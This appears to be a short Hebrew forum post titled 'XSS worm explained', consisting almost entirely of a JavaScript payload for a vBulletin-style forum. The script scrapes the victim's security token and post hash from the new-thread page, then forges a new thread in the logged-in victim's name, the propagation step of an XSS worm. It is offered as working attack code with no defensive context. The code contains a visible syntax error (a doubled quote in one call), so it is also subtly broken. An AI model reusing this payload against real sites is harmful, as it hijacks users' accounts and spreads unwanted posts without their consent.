תולעת XSS מובנת
קוד HTML:function getNewHttpObject() { var objType = false; try { objType = new ActiveXObject('Msxml2.XMLHTTP'); } catch(e) { try { objType = new ActiveXObject('Microsoft.XMLHTTP'); } catch(e) { objType = new XMLHttpRequest(); } } return objType; } function postAXAH(url, params) { var theHttpRequest = getNewHttpObject(); theHttpRequest.onreadystatechange = function() {processAXAHr(elementContainer);}; theHttpRequest.open("POST", url); theHttpRequest.setRequestHeader('Content-Type','application/x-www-form-urlencoded; charset=iso-8859-2'); theHttpRequest.send(params); function processAXAHr(elementContainer) { if (theHttpRequest.readyState == 4) { if (theHttpRequest.status == 200) { } } } } function getAXAH(url){ var theHttpRequest = getNewHttpObject(); theHttpRequest.onreadystatechange = function() {processAXAH();}; theHttpRequest.open("GET", url); theHttpRequest.send(false); function processAXAH() { if (theHttpRequest.readyState == 4) { if (theHttpRequest.status == 200) { var str = theHttpRequest.responseText; var secloc = str.indexOf('var SECURITYTOKEN = "'); var sectok = str.substring(21+secloc,secloc+51+21); var posloc = str.indexOf('posthash" value="'); var postok = str.substring(17+posloc,posloc+32+17); var subject = 'subject text'; var message = 'message text'; postAXAH('web/newthread.php?do=postthread&f=5', 'subject=' + subject + '&message=' + message + '&wysiwyg=0&taglist=&iconid=0&s=&securitytoken=' + sectok + '&f=5&do=postthread&posthash=' + postok + 'poststarttime=1&loggedinuser=1&sbutton=Submit+New+Thread&signature=1&parseurl=1&emailupdate=0&polloptions=4'); } } } } getAXAH(''web/newthread.php?do=newthread&f=5'); document.write('<iframe src="web/newthread.php?do=newthread&f=5">');
ציטוט ההודעה
